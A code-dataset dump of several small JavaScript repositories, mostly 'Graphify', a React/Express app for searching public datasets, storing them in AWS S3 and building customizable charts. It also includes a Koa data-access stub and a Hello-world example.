branch_name stringclasses 149 values | text stringlengths 23 89.3M | directory_id stringlengths 40 40 | languages listlengths 1 19 | num_files int64 1 11.8k | repo_language stringclasses 38 values | repo_name stringlengths 6 114 | revision_id stringlengths 40 40 | snapshot_id stringlengths 40 40 |
|---|---|---|---|---|---|---|---|---|
refs/heads/master | <file_sep>const {User} = require('../models/user')
const bcrypt = require('bcryptjs')
const {Admin} = require('../models/admin')
// data access object
class UserDao {
// 创建用管理员
static async getInfo(v) {
const scope = 'bh';
const user = await Admin.scope(scope).findOne({
where: {
id
}
})
return user
}
}
module.exports = {
UserDao
} | cdbb3575e743b0d49860df54e30e961a418fdc16 | [
"JavaScript"
] | 1 | JavaScript | xxh930818/nodejs-koa | db6fda5f1979aa080ad1ca8ab53b73f1e5a6fdef | ff37d00180d38de8441c16a6bb42f1635f6b6dd3 |
refs/heads/master | <repo_name>Mangesh242/Hello-world<file_sep>/app.js
console.log("Hello World");
console.log("added new member to code");
<file_sep>/README.md
# Hello-world
just a repository
PR request example
to run program
node app.js
| ea3391e5f5b439fa517025135282b7b8799e8526 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | Mangesh242/Hello-world | 081774c1b203533b253cf512bb22f047f3f38f5a | 4ea31e79621d5904adc7c3d220eee54f91092695 |
refs/heads/master | <file_sep>const router = require('express').Router();
const soda = require('soda-js');
module.exports = router;
router.get('/', (req, res, next) => {
//delete these console logs in the future
//also maybe delete this route????
console.log('hit the soda route')
const { id, domain } = req.query;
console.log('soda',id, domain);
let consumer = new soda.Consumer(domain);
consumer.query()
.withDataset(id)
.getRows()
.on('success', function(rows) { console.log(rows); })
.on('error', function(error) { console.error(error); });
})<file_sep>const router = require('express').Router()
const {User, Graph, Dataset} = require('../db/models')
const axios = require('axios')
const {AWS_KEY, AWS_SECRET, AWS_BUCKET} = process.env || require('../../secrets')
const AWS = require('aws-sdk')
// set all the keys and region here
AWS.config.update({
accessKeyId: AWS_KEY,
secretAccessKey: AWS_SECRET,
region: 'us-east-2'
})
module.exports = router
router.post('/login', async (req, res, next) => {
const user = await User.findOne({
where: {
email: req.body.email
},
include: [{model: Graph}, {model: Dataset}]
})
if (!user) {
console.log('No such user found:', req.body.email)
res.status(401).send('Wrong username and/or password')
} else if (!user.correctPassword(req.body.password)) {
console.log('Incorrect password for user:', req.body.email)
res.status(401).send('Wrong username and/or password')
} else {
req.login(user, err => (err ? next(err) : res.json(user)))
}
})
router.post('/signup', async (req, res, next) => {
try {
const user = await User.create(req.body)
req.login(user, err => (err ? next(err) : res.json(user)))
} catch (err) {
if (err.name === 'SequelizeUniqueConstraintError') {
res.status(401).send('User already exists')
} else {
next(err)
}
}
})
router.post('/logout', (req, res) => {
req.logout()
req.session.destroy()
res.redirect('/')
})
router.get('/me', (req, res) => {
res.json(req.user)
})
router.use('/google', require('./google'))
<file_sep>const router = require('express').Router();
const {Graph, YAxis, Dataset} = require('../db/models')
const {AWS_KEY, AWS_SECRET, AWS_BUCKET} = process.env || require('../../secrets')
const AWS = require('aws-sdk')
// set all the keys and region here
AWS.config.update({
accessKeyId: AWS_KEY,
secretAccessKey: AWS_SECRET,
region: 'us-east-2'
})
module.exports = router;
router.get('/:awsId', (req, res, next) => {
const {awsId} = req.params
let datasetParams = {Bucket: AWS_BUCKET, Key: awsId}
//this makes the promise to do the actual request, get object is a get request
let findDatasetPromise = new AWS.S3({apiVersion: '2006-03-01'})
.getObject(datasetParams)
.promise()
findDatasetPromise
.then(result => {
let parsedDataset = JSON.parse(result.Body)
parsedDataset.awsId = awsId;
res.json(parsedDataset)
})
.catch(next)
})
router.get('/graph/:graphId', (req, res, next) => {
const {graphId} = req.params
let datasetParams = {Bucket: AWS_BUCKET, Key: graphId}
//this makes the promise to do the actual request, get object is a get request
let findDatasetPromise = new AWS.S3({apiVersion: '2006-03-01'})
.getObject(datasetParams)
.promise()
findDatasetPromise
.then(result => {
let parsedDataset = JSON.parse(result.Body)
res.json(parsedDataset)
})
.catch(next)
})
router.post('/graph/:graphId', (req, res, next) => {
const {graphId} = req.params
const {svgBlob} = req.body
const stringifiedImage = JSON.stringify({svgBlob});
let datasetParams = {Bucket: AWS_BUCKET, Key: graphId, Body: stringifiedImage}
// this makes the promise to do the actual request, get object is a get request
let uploadBlobPromise = new AWS.S3({apiVersion: '2006-03-01'})
.putObject(datasetParams)
.promise()
uploadBlobPromise
.then(result => {
res.status(200).send(graphId);
})
.catch(next)
})
<file_sep>import React, {Component} from 'react'
import ShowSearchResults from './ShowSearchResults.jsx'
import history from '../history'
import {getSocrataCategories, searchSocrataForDatasets} from '../componentUtils'
export default class SearchBar extends Component {
constructor(props) {
super(props)
this.state = {
results: [],
search: '',
showResults: false,
submittedSearch: '',
searchCategories: [],
filter: 'no filter'
}
this.handleChange = this.handleChange.bind(this)
this.handleFilter = this.handleFilter.bind(this)
this.handleSubmit = this.handleSubmit.bind(this)
}
componentDidMount() {
const {search} = this.props.location
const queryIndex = search.indexOf('?query=')
const filterIndex = search.indexOf('&filter=')
let filter = 'no filter'
let searchbar = ''
let end = filterIndex === -1 ? search.length : filterIndex
if (queryIndex !== -1) {
searchbar = search.slice(queryIndex + 7, end).replace(/%20/g, ' ')
}
if (filterIndex !== -1) {
filter = search.slice(filterIndex + 8).replace(/%20/g, ' ')
}
getSocrataCategories()
.then(categories => {
let setFilter = categories.includes(filter) ? filter : 'no filter'
this.setState({
search: searchbar,
searchCategories: categories,
filter: setFilter
})
if (queryIndex !== -1 || filterIndex !== -1) {
document.getElementById('search-button').click()
}
})
.catch(console.error)
}
handleChange(event) {
const search = event.target.value
this.setState({search})
}
handleFilter(event) {
const filter = event.target.value
this.setState({filter})
}
handleSubmit(event) {
event.preventDefault()
const {search} = this.state
const filter = this.state.filter === 'no filter' ? '' : this.state.filter
searchSocrataForDatasets(search, filter)
.then(results => {
this.setState({results, showResults: true, submittedSearch: search})
history.push(`/search?query=${search}&filter=${filter}`)
})
.catch(console.error)
}
render() {
const {results, submittedSearch, searchCategories} = this.state
return (
<div>
<h2 id="searchbar-name">Search among more than 10,000 datasets</h2>
<form onSubmit={this.handleSubmit}>
<input
placeholder="Search Dataset"
className="searchbar-input"
onChange={this.handleChange}
name="searchbar"
value={this.state.search}
/>
<div className="searchbar-select">
{searchCategories.length > 0 && (
<select onChange={this.handleFilter} value={this.state.filter}>
<option hidden value="no filter">
Select Category
</option>
{searchCategories.map(category => (
<option value={category} key={category}>
{category}
</option>
))}
</select>
)}
<button type="submit" id="search-button">
Search
</button>
</div>
</form>
<br />
<div className="searches">
{this.state.showResults && (
<ShowSearchResults results={results} search={submittedSearch} />
)}
</div>
</div>
)
}
}
<file_sep>const { getDatasetFromS3, getGraphImgFromS3 } = require('./AWSutils')
module.exports = {
getDatasetFromS3,
getGraphImgFromS3
}<file_sep>import React, {Component} from 'react'
import CSVReader from 'react-csv-reader'
import store, {uploadData, resetGraphSettings} from '../store'
import history from '../history'
export default class Home extends Component {
constructor(props) {
super(props)
this.handleUpload = this.handleUpload.bind(this)
this.handleSearch = this.handleSearch.bind(this)
}
handleUpload(data, fileName) {
store.dispatch(resetGraphSettings())
store.dispatch(uploadData(data, fileName))
}
handleSearch(event) {
event.preventDefault()
store.dispatch(resetGraphSettings())
history.push('/search')
}
render() {
return (
<div id="home">
<div>
<h1 id="home-name">GRAPHIFY</h1>
<h3>Graph Your World</h3>
</div>
<div id="home-buttons-container">
<button className="home-buttons" onClick={this.handleSearch}>
Search Our Datasets
</button>
<div className='home-buttons'>
Upload File
<CSVReader
cssClass="react-csv-input"
onFileLoaded={this.handleUpload}
/>
</div>
</div>
</div>
)
}
}
<file_sep>const Sequelize = require('sequelize')
const db = require('../db')
const Graph = db.define('graph', {
graphId: {
type: Sequelize.STRING
},
xAxis: {
type: Sequelize.STRING
},
title: {
type: Sequelize.STRING,
defaultValue: ''
},
description: {
type: Sequelize.TEXT,
defaultValue: ''
},
xAxisLabel: {
type: Sequelize.STRING,
defaultValue: ''
},
yAxisLabel: {
type: Sequelize.STRING,
defaultValue: ''
},
graphType: {
type: Sequelize.STRING,
defaultValue: ''
},
thumbnail: {
type: Sequelize.STRING,
defaultValue: 'graph.gif'
},
colors: {
type: Sequelize.ARRAY(Sequelize.STRING),
defaultValue: ['#8884d8', '#82ca9d', '#ffc658', '#FF8042']
}
})
module.exports = Graph
<file_sep>import axios from 'axios';
export const getSocrataCategories = () => {
return axios.get('https://api.us.socrata.com/api/catalog/v1/categories')
.then(res => res.data.results)
.then(categories => {
return categories.map(category => category.category)
})
.catch(console.error);
}
export const searchSocrataForDatasets = (search, category) => {
return axios.get(`https://api.us.socrata.com/api/catalog/v1?only=datasets&q=${search}&categories=${category}`)
.then(res => res.data)
.catch(console.error);
}
<file_sep>import React from 'react'
const DatasetPreview = (props) => {
const { result } = props;
const description = result.resource.description.split(' ').slice(0, 20);
return (
<div className="dataset-preview">
<a className="dataset-preview-link" onClick={(event) => props.handleClick(event, result)}>
<h3>{result.resource.name}</h3>
</a>
<h5 className="dataset-preview-permalink">{result.permalink}</h5>
<h4 className="dataset-preview-detail">{description.length === 20 ? description.join(' ') + '...' : description.join(' ')}</h4>
</div>
)
}
export default DatasetPreview;
<file_sep>
export * from './popupCreators'
export * from './socrataFunctions'<file_sep>import React, { Component } from 'react'
import { connect } from 'react-redux'
import {
LineChartGraph,
BarChartGraph,
AreaChartGraph,
RadarChartGraph,
ScatterChartGraph,
PieChartGraph
} from './graphs'
import {
updateTitle,
updateDescription,
updateXAxisName,
updateYAxisName,
updateColor,
fetchAndSetGraph,
fetchAndSetDataFromS3,
saveGraphSettingToDB
} from '../store'
import { HuePicker } from 'react-color'
import axios from 'axios'
import FileSaver from 'file-saver'
import { toast, ToastContainer } from 'react-toastify'
import { SharePopup } from '../componentUtils'
import htmlToImage from 'html-to-image'
import {CURRENT_HOST} from '../../secrets'
axios.defaults.baseURL = `http://${CURRENT_HOST}`
class SingleGraphView extends Component {
constructor(props) {
super(props)
this.state = {
legend: -1
}
this.handleChange = this.handleChange.bind(this)
this.handleChangeColor = this.handleChangeColor.bind(this)
this.handleSave = this.handleSave.bind(this)
this.handleClone = this.handleClone.bind(this)
this.exportChart = this.exportChart.bind(this)
this.exportSVG = this.exportSVG.bind(this)
this.giveLink = this.giveLink.bind(this)
}
componentDidMount() {
const { graphId } = this.props.match.params
const { getGraphId } = this.props
this.props.getGraphId(graphId)
}
// Exports the graph as embedded JS or PNG
exportChart(asSVG) {
const chartSVG = document.getElementById('single-graph-container-chart').children[0]
htmlToImage.toJpeg(chartSVG, { backgroundColor: '#FFFFFF', height: 700, width: 700, style: { margin: 'auto', verticalAlign: 'center' } })
.then((dataUrl) => {
let link = document.createElement('a');
link.download = `${this.props.graphSettings.title}.jpeg`;
link.href = dataUrl;
link.click();
})
}
exportSVG() {
const chartSVG = document.getElementById('single-graph-container-chart').children[0]
toast('SVG Copied', {
autoClose: 3000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
return new XMLSerializer().serializeToString(chartSVG)
}
handleChange(event) {
const name = event.target.name
const value = event.target.value
const {
changeTitle,
changeXAxisName,
changeYAxisName,
addDescription
} = this.props
switch (name) {
case 'title':
return changeTitle(value)
case 'description':
return addDescription(value)
case 'XAxis':
return changeXAxisName(value)
case 'YAxis':
return changeYAxisName(value)
}
}
handleClick(idx) {
this.setState({ legend: idx })
}
handleChangeColor(color) {
this.props.changeColor(color.hex, this.state.legend)
this.setState({ legend: -1 })
}
handleClone() {
const {
currentX,
currentY,
title,
xAxisName,
yAxisName,
colors,
graphType,
description
} = this.props.graphSettings
const { awsId, name } = this.props.dataset
return axios
.post(`api/graphs`, {
xAxis: currentX,
yAxis: currentY,
xAxisLabel: xAxisName,
yAxisLabel: yAxisName,
colors,
title,
graphType,
datasetName: name,
description,
awsId
})
.then(res => {
const chartSVG = document.getElementById('single-graph-container-chart').children[0]
return htmlToImage.toJpeg(chartSVG, { backgroundColor: '#FFFFFF', height: 700, width: 700, style: { margin: 'auto', verticalAlign: 'center' } })
.then((dataUrl) => {
return axios.post(`/api/aws/graph/${res.data}`, {
svgBlob: dataUrl
})
})
})
.then(res => {
this.props.history.push(`/graph-dataset/customize/${res.data}`)
return this.props.getGraphId(res.data)
})
.then(() => {
return toast('Graph Cloned', {
autoClose: 4000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
})
.catch(console.error)
}
handleSave(graphId) {
const settings = this.props.graphSettings
this.props.saveGraphSetting(graphId, settings)
toast('Graph Saved', {
autoClose: 3000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
const chartSVG = document.getElementById('single-graph-container-chart').children[0]
return htmlToImage.toJpeg(chartSVG, { backgroundColor: '#FFFFFF', height: 700, width: 700, style: { margin: 'auto', verticalAlign: 'center' } })
.then((dataUrl) => {
return axios.post(`/api/aws/graph/${graphId}`, {
svgBlob: dataUrl
})
})
.catch(console.error)
}
giveLink() {
toast('Link Copied', {
autoClose: 3000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
return `${CURRENT_HOST}/graph-dataset/customize/${this.props.match.params.graphId}`
}
render() {
const { graphId } = this.props.match.params
let { currentY, graphType, colors, description } = this.props.graphSettings
const image = this.state.image
return (
<div id="single-graph">
<div id="single-graph-buttons">
<button
id="single-graph-buttons-save"
type="submit"
onClick={() => this.handleSave(graphId)}
>
Save
</button>
<button id="single-graph-buttons-clone" onClick={this.handleClone}>
Clone
</button>
{SharePopup(
<button id="single-graph-buttons-share">Share</button>,
this.exportChart,
this.giveLink,
this.exportSVG
)}
</div>
<div id="single-graph-container">
<div id="single-graph-container-chart">
{(function () {
switch (graphType) {
case 'Line':
return <LineChartGraph />
case 'Bar':
return <BarChartGraph />
case 'Area':
return <AreaChartGraph />
case 'Radar':
return <RadarChartGraph />
case 'Scatter':
return <ScatterChartGraph />
case 'Pie':
return <PieChartGraph />
default:
return null
}
})()}
</div>
<div id="single-graph-container-settings">
<div id="single-graph-container-settings-container">
<form>
<label>Title</label>
<input
className="single-graph-input"
type="text"
name="title"
onChange={this.handleChange}
/>
<label>X axis Name</label>
<input
className="single-graph-input"
type="text"
name="XAxis"
onChange={this.handleChange}
/>
<label>Y axis Name</label>
<input
className="single-graph-input"
type="text"
name="YAxis"
onChange={this.handleChange}
/>
<label>Description</label>
<input
className="single-graph-input"
type="text"
name="description"
onChange={this.handleChange}
/>
</form>
<div>
{currentY.map((yAxis, idx) => (
<div key={idx}>
<label>{`${yAxis[0].toUpperCase()}${yAxis.slice(
1
)} Color`}</label>
<button
className="single-graph-settings-buttons"
onClick={() => this.handleClick(idx)}
>
Pick Color
</button>
{this.state.legend !== -1 ? (
<div>
<div onClick={this.handleClose} />
<HuePicker
color={colors[idx]}
onChangeComplete={this.handleChangeColor}
/>
</div>
) : null}
</div>
))}
</div>
</div>
</div>
</div>
<div id="current-chart-description">
{description.length !== '' ? (
<div className="current-chart-description">
<h3>Description:</h3>
<p>{`${description}`}</p>
</div>
) : null}
</div>
<ToastContainer className="toast" />
</div>
)
}
}
const mapState = state => {
return {
graphSettings: state.graphSettings,
dataset: state.dataset
}
}
const mapDispatch = dispatch => ({
changeTitle(title) {
dispatch(updateTitle(title))
},
addDescription(description) {
dispatch(updateDescription(description))
},
changeXAxisName(name) {
dispatch(updateXAxisName(name))
},
changeYAxisName(name) {
dispatch(updateYAxisName(name))
},
changeColor(color, idx) {
dispatch(updateColor(color, idx))
},
getGraphId: graphId => {
dispatch(fetchAndSetGraph(graphId))
},
getDataset: graphId => {
dispatch(fetchAndSetDataFromS3(graphId))
},
saveGraphSetting: (graphId, settings) => {
dispatch(saveGraphSettingToDB(graphId, settings))
}
})
export default connect(mapState, mapDispatch)(SingleGraphView)
<file_sep>import React, { Component } from 'react'
import store, {getAsyncData} from '../store'
import SearchDatasetPreview from './SearchDatasetPreview'
export default class ShowResults extends Component {
constructor(props) {
super(props)
this.handleClick = this.handleClick.bind(this);
}
handleClick(event, result) {
event.preventDefault();
const domain = result.metadata.domain;
const id = result.resource.id;
const datasetName = result.resource.name;
let columObj = {};
result.resource.columns_name.forEach((columnName, i) => {
columObj[columnName] = result.resource.columns_datatype[i];
})
store.dispatch(getAsyncData(domain, id, columObj, datasetName));
}
render() {
const { results } = this.props.results;
const {search} = this.props;
return (
<div className="search-results">
{results.length > 0 ?
results.map((result, idx) => {
return (
<div className="search-results-dataset search-results-dataset-box" key={result.resource.id}>
<SearchDatasetPreview result={result} handleClick={this.handleClick} />
</div>
)
}) : <h2>Results not found for {search}</h2>
}
</div>
)
}
}
<file_sep>##Graphify
Graphify is a data visualization web app that allows users to easily upload and save datasets as well as creating and sharing customizable charts, additionally it allows users to search and visualize from more than 10,000 datasets.
Upload your own data or search it from public datasets
Graphify allows users to upload and save their own datasets, and immediately begins to explore different ways of displaying them. For managing the storage of datasets, we use AWS. Users can also search public datasets via Socrata Open Data API.
Display graphs based on users' selected data
Once users select data, Graphify automatically creates previews with all available charts. If users are not sure what would be the best graph to represent their data, Graphify also gives a recommendation based on users' selecting data.
Graph Types Available
- Line Graph
- Bar Graph
- Pie Chart
- Scatterplot
- Area Chart
- Radar Chart
Edit, share and clone graphs in real time
Users not only could customize graphs in their specifications, like title, names of X and Y axes, legend, colors, etc, but also could share their graphs through an unique link, embed them as SVG file and download them as an image. Users could make a clone of a selected graph,save in their profile any changes they make.
Technologies applied
- Node.js
- ReactJS
- Redux
- AWS S3
- D3.js
- Soda-js
- RechartJs
- Express
- Sequelize
- PostgreSQL
- Reacjs-popup
- react-toastify
- React-table
- React-color
- React-CSV-reader
<file_sep>import React, {Component} from 'react'
import {connect} from 'react-redux'
import {Link} from 'react-router-dom'
import {
meAndGraphImages,
fetchAndSetDataFromS3,
resetGraphSettings,
deleteDataset,
deleteGraph
} from '../store'
import {ToastContainer} from 'react-toastify'
import {DeletePopup} from '../componentUtils'
import renderHtml from 'react-render-html'
import axios from 'axios'
import htmlToImage from 'html-to-image'
export class UserProfile extends Component {
constructor(props) {
super(props)
this.state = {}
}
componentDidMount() {
this.props.meAndGraphImages().then(res => {
this.props.user.graphs.forEach(graph => {
const {graphId} = graph
this.setState({[graphId]: ''})
})
let thisPromise = this.props.user.graphs.map(graph => {
this.getGraphImages(graph.graphId)
.then(res => {
const {graphId} = graph;
this.setState({[graphId]: res.svgBlob})
})
})
Promise.all(thisPromise)
.catch(console.error)
})
}
handleDatasetClick = awsId => {
this.props.resetGraphSettings()
this.props.fetchAndSetDataFromS3(awsId)
}
handleDeleteDataset = (datasetId, close) => {
this.props.deleteDataset(datasetId)
close()
}
handleDeleteGraph = graphId => {
this.props.deleteGraph(graphId)
}
getGraphImages = graphId => {
return axios
.get(`/api/graphs/aws/images/${graphId}`)
.then(res => {
return res.data
})
.catch(console.error)
}
render() {
const {graphs, datasets} = this.props.user
return (
<div id="profile">
<div id="profile-content">
<div id="profile-datasets">
<h2 className="profile-title">My Datasets</h2>
<div id="profile-datasets-wrapper">
{datasets &&
datasets.map(dataset => (
<div key={dataset.id} className="dataset-link">
<a onClick={() => this.handleDatasetClick(dataset.awsId)}>
<h3 id="profile-datasets-wrapper-name">{dataset.name}</h3>
</a>
{DeletePopup(
<button className="delete-dataset-and-graph">x</button>,
this.handleDeleteDataset,
dataset.id,
'dataset'
)}
</div>
))}
</div>
</div>
<div id="profile-graphs">
<h2 className="profile-title">My Graphs</h2>
<div id="profile-graphs-wrap">
{graphs &&
graphs.map(graph => (
<div key={graph.id} className="profile-graphs-single">
<Link to={`/graph-dataset/customize/${graph.graphId}`}>
<img src={this.state[graph.graphId]}/>
</Link>
{DeletePopup(
<button className="delete-graph">
Delete graph
</button>,
this.handleDeleteGraph,
graph.id,
'graph'
)}
</div>
))}
</div>
</div>
</div>
<ToastContainer />
</div>
)
}
}
const mapState = state => {
return {
user: state.user
}
}
const mapDispatch = dispatch => ({
meAndGraphImages: () => dispatch(meAndGraphImages()),
resetGraphSettings: () => dispatch(resetGraphSettings()),
fetchAndSetDataFromS3: awsId => dispatch(fetchAndSetDataFromS3(awsId)),
deleteDataset: datasetId => dispatch(deleteDataset(datasetId)),
deleteGraph: graphId => dispatch(deleteGraph(graphId))
})
export default connect(mapState, mapDispatch)(UserProfile)
<file_sep>import React from 'react'
import {connect} from 'react-redux'
import {PieChart, Pie, Tooltip, Legend, ResponsiveContainer} from 'recharts'
export const PieChartGraph = props => {
function quantityMaker(arr, term) {
let quantityObj = {}
arr.forEach(row => {
let value = row[term]
quantityObj[value] = quantityObj[value] + 1 || 1
})
let objArr = Object.keys(quantityObj).map(name => {
return {
name: name,
value: Math.round(quantityObj[name] * 100 / arr.length)
}
})
return objArr
}
const {dataset, graphSettings} = props
const {
currentX,
currentY,
title,
xAxisName,
yAxisName,
colors
} = graphSettings
return (
<div className="graph-dataset-graphs-single">
<h2>{title}</h2>
<ResponsiveContainer width="105%" height={550}>
<PieChart>
<Pie
isAnimationActive={true}
data={quantityMaker(dataset.dataset, currentX)}
dataKey="value"
cx={280}
cy={280}
innerRadius={120}
fill={colors[0]}
label
/>
<Tooltip />
</PieChart>
</ResponsiveContainer>
</div>
)
}
const mapState = state => {
return {
dataset: state.dataset,
graphSettings: state.graphSettings
}
}
export default connect(mapState)(PieChartGraph)
<file_sep>const router = require('express').Router()
const {Graph, YAxis, Dataset} = require('../db/models')
const {AWS_KEY, AWS_SECRET, AWS_BUCKET} =
process.env || require('../../secrets')
const AWS = require('aws-sdk')
// set all the keys and region here
AWS.config.update({
accessKeyId: AWS_KEY,
secretAccessKey: AWS_SECRET,
region: 'us-east-2'
})
const {getDatasetFromS3} = require('../utils')
const crypto = require('crypto')
module.exports = router
router.get('/:graphId', (req, res, next) => {
const {graphId} = req.params
Graph.findOne({
where: {graphId},
include: [{model: YAxis}, {model: Dataset}]
})
.then(graph => {
const {awsId} = graph.dataset.dataValues
const graphDataObj = {}
getDatasetFromS3(awsId).then(dataset => {
graphDataObj.dataset = dataset
graphDataObj.graph = graph
res.send(graphDataObj)
})
})
.catch(next)
})
router.post('/', (req, res, next) => {
if (req.user) {
const graphId = crypto
.randomBytes(8)
.toString('base64')
.replace(/\//g, '7')
const {
xAxis,
yAxis,
title,
graphType,
datasetName,
xAxisLabel,
yAxisLabel,
colors,
description,
awsId
} = req.body
const userId = req.user.id
let makingGraph = Graph.create({
userId,
graphId,
xAxis,
title,
graphType,
xAxisLabel,
yAxisLabel,
colors,
description
})
let makingYAxes = Promise.all(
yAxis.map(name => {
return YAxis.create({name})
})
)
let makingDataset = Dataset.findOrCreate({
where: {
name: datasetName,
userId,
awsId
}
})
return Promise.all([makingGraph, makingYAxes, makingDataset])
.then(([newGraph, newYAxes, newDataset]) => {
let setY = newGraph.setYAxes(newYAxes)
let setDataset = newGraph.setDataset(newDataset[0])
return Promise.all([setY, setDataset])
})
.then(() => res.status(200).send(graphId))
.catch(next)
} else {
res.status(401).send('You need to be a user to save graph data')
}
})
router.put('/:graphId', (req, res, next) => {
if (req.user) {
const {graphId} = req.params
const {
xAxis,
yAxis,
xAxisLabel,
yAxisLabel,
title,
description,
graphType,
colors
} = req.body
const userId = req.user.id
//find the graph you need
Graph.findOne({
where: {
graphId
},
include: [{model: YAxis}]
})
//update the found graph
.then(foundGraph => {
let effectedGraph = foundGraph.update({
xAxis,
xAxisLabel,
yAxisLabel,
title,
description,
graphType,
colors
})
//destroy the current yAxes
foundGraph.yAxes.map(yAxis => {
return yAxis.destroy()
})
//create new yAxes based off of what was sent
let newYAxes = Promise.all(
yAxis.map(y => {
return YAxis.create({name: y})
})
)
//return everything in a promise
return Promise.all([effectedGraph, newYAxes]) // CG: AFFECTED GRAPH!
})
//set the newYAxes as connected to the graph
.then(([updatedGraph, createdAxes]) => {
return updatedGraph.setYAxes(createdAxes)
})
.then(() => {
res.status(200).send('graph updated')
})
.catch(next)
} else {
res.status(401).send('You need to be logged in to edit this graph')
}
})
router.get('/aws/:awsId', (req, res, next) => {
if (req.user) {
//have some kind of security so that we don't do this if the user doesn't have access to the graph
const {awsId} = req.params
let datasetParams = {Bucket: AWS_BUCKET, Key: awsId}
//this makes the promise to do the actual request, get object is a get request
let findDatasetPromise = new AWS.S3({apiVersion: '2006-03-01'})
.getObject(datasetParams)
.promise()
findDatasetPromise
.then(result => {
let parsedDataset = JSON.parse(result.Body)
parsedDataset.dataset.awsId = awsId
res.json(parsedDataset)
})
.catch(next)
} else {
res.send(401).send('You must be logged in to access a dataset')
}
})
router.get('/aws/images/:awsId', (req, res, next) => {
if (req.user) {
//have some kind of security so that we don't do this if the user doesn't have access to the graph
const {awsId} = req.params
let datasetParams = {Bucket: AWS_BUCKET, Key: awsId}
//this makes the promise to do the actual request, get object is a get request
let findDatasetPromise = new AWS.S3({apiVersion: '2006-03-01'})
.getObject(datasetParams)
.promise()
findDatasetPromise
.then(result => {
let parsedImage = JSON.parse(result.Body)
res.json(parsedImage)
})
.catch(next)
} else {
res.send(401).send('You must be logged in to access a dataset')
}
})
router.post('/aws', (req, res, next) => {
if (req.user) {
const awsId = crypto
.randomBytes(8)
.toString('base64')
.replace(/\//g, '7')
const {dataset, columnObj} = req.body
const stringifiedDataset = JSON.stringify({dataset, columnObj})
let datasetParams = {
Bucket: AWS_BUCKET,
Key: awsId,
Body: stringifiedDataset
}
//this creates or updates the desired object
let uploadDatasetPromise = new AWS.S3({apiVersion: '2006-03-01'})
.putObject(datasetParams)
.promise()
uploadDatasetPromise
.then(data => {
res.status(200).send(awsId)
})
.catch(next)
} else {
res.status(401).send('Please log in to save your data')
}
})
<file_sep>import { expect } from 'chai'
import { setData } from './dataset'
import configureMockStore from 'redux-mock-store'
import thunkMiddleware from 'redux-thunk'
const middlewares = [thunkMiddleware]
const mockStore = configureMockStore(middlewares)
describe('dataset thunk creators', () => {
let store
const initialState = {
dataset: [],
columnObj: {},
name: ''
}
beforeEach(() => {
store = mockStore(initialState)
})
afterEach(() => {
store.clearActions()
})
describe('upload data', () => {
it('adds the correct number of rows to dataset', () => {
const fakeData = [
{Owner: 'Nancy', Cats: 5, Dogs: 3, Hamsters: 2},
{Owner: 'Raplph', Cats: 1, Dogs: 2, Hamsters: 1}
];
const fakeFileName = 'Animal Count';
const fakeColumnObj = {
Owner: 'text', Cats: 'number', Dogs: 'number', Hamsters: 'number'
}
const fakeDataset = {
dataset: fakeData, columnObj: fakeColumnObj, name: fakeFileName
}
store.dispatch(setData(fakeDataset))
const actions = store.getActions();
expect(actions[0].type).to.be.equal('SET_DATA');
expect(actions[0].data.dataset).to.be.deep.equal(fakeData);
})
})
})<file_sep>import React from 'react'
import PropTypes from 'prop-types'
import {connect} from 'react-redux'
import {Link} from 'react-router-dom'
import {logout} from '../store'
const Navbar = ({handleClick, isLoggedIn, email}) => {
const name = email
? `${email[0].toUpperCase()}${email.slice(1, email.search('@'))}`
: ''
return (
<div id="navbar">
<div>
<Link id="navbar-home" to="/">
<img id="navbar-home-img" src="/graph-icon.png" />
<h1 id="navbar-home-name">GRAPHIFY</h1>
</Link>
</div>
<nav id="navbar-options">
{isLoggedIn ? (
<div>
{/* The navbar will show these links after you log in */}
<div className="navbar-options-name">
<h3>Hi, {name}!</h3>
</div>
<Link className="navbar-options-buttons" to="/profile">
My Account
</Link>
<a
className="navbar-options-buttons"
href="/"
onClick={handleClick}
>
Logout
</a>
</div>
) : (
<div>
{/* The navbar will show these links before you log in */}
<Link className="navbar-options-buttons" to="/login">
Login
</Link>
<Link className="navbar-options-buttons" to="/signup">
Sign Up
</Link>
</div>
)}
</nav>
</div>
)
}
/**
* CONTAINER
*/
const mapState = state => {
return {
email: state.user.email,
isLoggedIn: !!state.user.id
}
}
const mapDispatch = dispatch => {
return {
handleClick() {
dispatch(logout())
}
}
}
export default connect(mapState, mapDispatch)(Navbar)
/**
* PROP TYPES
*/
Navbar.propTypes = {
handleClick: PropTypes.func.isRequired,
isLoggedIn: PropTypes.bool.isRequired
}
<file_sep>import React, { Component } from 'react'
import { connect } from 'react-redux'
import {
LineChartGraph,
BarChartGraph,
AreaChartGraph,
RadarChartGraph,
ScatterChartGraph,
PieChartGraph
} from './graphs'
import ReactTable from 'react-table'
import { setXAxis, addYAxis, deleteYAxis } from '../store'
import axios from 'axios'
import { toast } from 'react-toastify'
import { NotLoggedInErrorPopup } from '../componentUtils'
import htmlToImage from 'html-to-image'
class GraphDataset extends Component {
constructor(props) {
super(props)
this.state = {
yCategQuantity: ['']
}
this.addYCategory = this.addYCategory.bind(this)
this.handleDeleteY = this.handleDeleteY.bind(this)
this.handleGraphClick = this.handleGraphClick.bind(this)
}
addYCategory() {
this.setState({
yCategQuantity: [...this.state.yCategQuantity, '']
})
}
handleDeleteY(idx) {
const { deleteY } = this.props
deleteY(idx)
this.setState({
yCategQuantity: this.state.yCategQuantity.slice(0, -1)
})
}
handleGraphClick(graphType) {
const { dataset, graphSettings } = this.props
const { currentX, currentY } = graphSettings
const datasetName = dataset.name
//upload to AWS only if the dataset doesn't already have an awsId
let AWSPost = !dataset.awsId
? axios.post(`api/graphs/aws`, { dataset })
: (AWSPost = Promise.resolve({ data: dataset.awsId }))
AWSPost.then(res => {
if (res.status === 401) {
}
return axios.post(`api/graphs`, {
xAxis: currentX,
yAxis: currentY,
title: datasetName,
datasetName,
graphType,
awsId: res.data
})
})
.then(res => {
let chartSVG = document.getElementById(`${graphType}-graph`).children[0];
const { graphId } = this.props.match.params
return htmlToImage.toJpeg(chartSVG, { backgroundColor: '#FFFFFF', height: 700, width: 700, style: { margin: 'auto', verticalAlign: 'center' } })
.then((dataUrl) => {
return axios.post(`/api/aws/graph/${res.data}`, {
svgBlob: dataUrl
})
})
})
.then(res => {
this.props.history.push(`/graph-dataset/customize/${res.data}`)
